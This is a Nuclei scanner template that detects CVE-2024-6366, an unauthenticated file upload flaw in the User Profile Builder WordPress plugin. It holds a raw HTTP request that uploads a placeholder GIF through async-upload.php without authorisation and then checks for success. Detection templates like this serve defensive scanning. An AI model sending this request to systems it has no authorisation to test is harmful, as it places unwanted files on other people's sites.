id: CVE-2024-6366 info: name: User Profile Builder < 3.11.8 - File Upload author: securityforeveryone severity: high description: | The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP. reference: - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/ - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366 - https://nvd.nist.gov/vuln/detail/CVE-2024-6366 classification: cve-id: CVE-2024-6366 epss-score: 0.00043 epss-percentile: 0.09351 metadata: vendor: cozmoslabs product: user-profile-builder framework: wordpress publicwww-query: "/wp-content/plugins/profile-builder" tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder flow: http(1) && http(2) variables: filename: "{{to_lower(rand_text_alpha(12))}}" http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"/plugins/profile-builder")' internal: true - raw: - | POST /wp-admin/async-upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="wppb_upload" true ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="meta_name" {{filename}}.gif ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="_wpnonce" e8 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="action" upload-attachment ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif" Content-Type: image/jpeg GIF89a ------WebKitFormBoundary7MA4YWxkTrZu0gW-- matchers-condition: and matchers: - type: word part: body words: - '"success":true' - '"id"' - '"uploadedTo"' condition: and - type: word part: header words: - 'Content-Type: text/plain' - type: status status: - 200